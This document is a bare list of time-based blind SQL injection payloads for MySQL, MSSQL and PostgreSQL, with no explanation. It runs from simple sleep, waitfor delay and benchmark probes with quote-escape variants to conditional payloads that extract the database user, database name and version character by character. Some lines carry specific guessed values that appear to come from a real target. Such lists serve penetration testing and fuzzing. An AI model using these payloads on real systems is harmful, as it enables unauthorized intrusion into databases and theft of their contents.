sleep(15)#
1 or sleep(15)#
\" or sleep(15)#
' or sleep(15)#
\" or sleep(15)=\"
' or sleep(15)='
1) or sleep(15)#
\") or sleep(15)=\"
') or sleep(15)='
1)) or sleep(15)#
\")) or sleep(15)=\"
')) or sleep(15)='
;waitfor delay '0:0:15'--
);waitfor delay '0:0:15'--
';waitfor delay '0:0:15'--
\";waitfor delay '0:0:15'--
');waitfor delay '0:0:15'--
\");waitfor delay '0:0:15'--
));waitfor delay '0:0:15'--
'));waitfor delay '0:0:15'--
\"));waitfor delay '0:0:15'--
benchmark(10000000,MD5(15))#
1 or benchmark(10000000,MD5(15))#
\" or benchmark(10000000,MD5(15))#
' or benchmark(10000000,MD5(15))#
1) or benchmark(10000000,MD5(15))#
\") or benchmark(10000000,MD5(15))#
') or benchmark(10000000,MD5(15))#
1)) or benchmark(10000000,MD5(15))#
\")) or benchmark(10000000,MD5(15))#
')) or benchmark(10000000,MD5(15))#
pg_sleep(15)--
1 or pg_sleep(15)--
\" or pg_sleep(15)--
' or pg_sleep(15)--
1) or pg_sleep(15)--
\") or pg_sleep(15)--
') or pg_sleep(15)--
1)) or pg_sleep(15)--
\")) or pg_sleep(15)--
')) or pg_sleep(15)--
AND (SELECT * FROM (SELECT(SLEEP(15)))bAKL) AND 'vRxe'='vRxe
AND (SELECT * FROM (SELECT(SLEEP(15)))YjoC) AND '%'='
AND (SELECT * FROM (SELECT(SLEEP(15)))nQIP)
AND (SELECT * FROM (SELECT(SLEEP(15)))nQIP)--
AND (SELECT * FROM (SELECT(SLEEP(15)))nQIP)#
SLEEP(15)#
SLEEP(15)--
SLEEP(15)=\"
SLEEP(15)='
or SLEEP(15)
or SLEEP(15)#
or SLEEP(15)--
or SLEEP(15)=\"
or SLEEP(15)='
waitfor delay '00:00:15'
waitfor delay '00:00:15'--
waitfor delay '00:00:15'#
benchmark(50000000,MD5(15))
benchmark(50000000,MD5(15))--
benchmark(50000000,MD5(15))#
or benchmark(50000000,MD5(15))
or benchmark(50000000,MD5(15))--
or benchmark(50000000,MD5(15))#
pg_SLEEP(15)
pg_SLEEP(15)--
pg_SLEEP(15)#
or pg_SLEEP(15)
or pg_SLEEP(15)--
or pg_SLEEP(15)#
'\\"
AnD SLEEP(15)
AnD SLEEP(15)--
AnD SLEEP(15)#
&&SLEEP(15)
&&SLEEP(15)--
&&SLEEP(15)#
' AnD SLEEP(15) ANd '1
'&&SLEEP(15)&&'1
ORDER BY SLEEP(15)
ORDER BY SLEEP(15)--
ORDER BY SLEEP(15)#
(SELECT * FROM (SELECT(SLEEP(15)))ecMj)
(SELECT * FROM (SELECT(SLEEP(15)))ecMj)#
(SELECT * FROM (SELECT(SLEEP(15)))ecMj)--
+benchmark(3200,SHA1(15))+'
+ SLEEP(15) + '
SLEEP(15)/*' or SLEEP(51) or '\" or SLEEP(15) or \"*/
,cAsT(chr(126)||pg_sleep(15)||chr(126)+aS+nUmeRiC)
' and (select*from(select(sleep(15)))a)-- -
' and if(length(user())=18,(select*from((select 1)a)where sleep(15)),0)-- -
' and if(substr(user(),1,1)=\"a\",(select*from((select 1)a)where sleep(15)),0)-- -
' and if(user()=\"root*\",(select*from((select 1)a)where sleep(15)),0)-- -
' and if(length(database())=3,(select*from((select 1)a)where sleep(15)),0)-- -
' and if(substr(database(),1,1)=\"v\",(select*from((select 1)a)where sleep(2)),0)-- -
' and if(database()LIKE\"%25vpd%25\",(select*from((select 1)a)where sleep(15)),0)-- -
' and if(length(version())=6,(select*from((select 1)a)where sleep(15)),0)-- -
' and if(substr(version(),1,1)=\"5\",(select*from((select 1)a)where sleep(15)),0)-- -
' and if(version()=\"5.*\",(select*from((select 1)a)where sleep(15)),0)--
' &nbsp;and &nbsp;(select*from(select(sleep(15)))a)-- &nbsp;
'+(case+when+length(user())=22+then+BENCHMARK(5000000,MD5('A'))+else+0+end)+'
'+(case+when+substring(user(),1,1)='f'+then+BENCHMARK(5000000,MD5('A'))+else+0+end)
'+(case+when+substring(user(),2,1)='-'+then+BENCHMARK(5000000,MD5('A'))+else+0+end)+'
'+(case+when+user()LIKE\"%25f-_c__a_1_____________%25\"+then+BENCHMARK(5000000,MD5('A'))+else+0+end)+'
'+(case+when+length(database())=17+then+BENCHMARK(5000000,MD5('A'))+else+0+end)+'
'+(case+when+substring(database(),1,1)='m'+then+BENCHMARK(5000000,MD5('A'))+else+0+end)+'
'+(case+when+database()LIKE\"%25Mariadbconnection%25\"+then+BENCHMARK(5000000,MD5('A'))+else+0+end)+'
'+(case+when+length(version())=19+then+BENCHMARK(5000000,MD5('A'))+else+0+end)+'
'+(case+when+substring(version(),1,1)='m'+then+BENCHMARK(5000000,MD5('A'))+else+0+end)+'
'+(case+when+version()LIKE\"%2510.3.13-mariadb-log%25\"+then+BENCHMARK(5000000,MD5('A'))+else+0+end)+'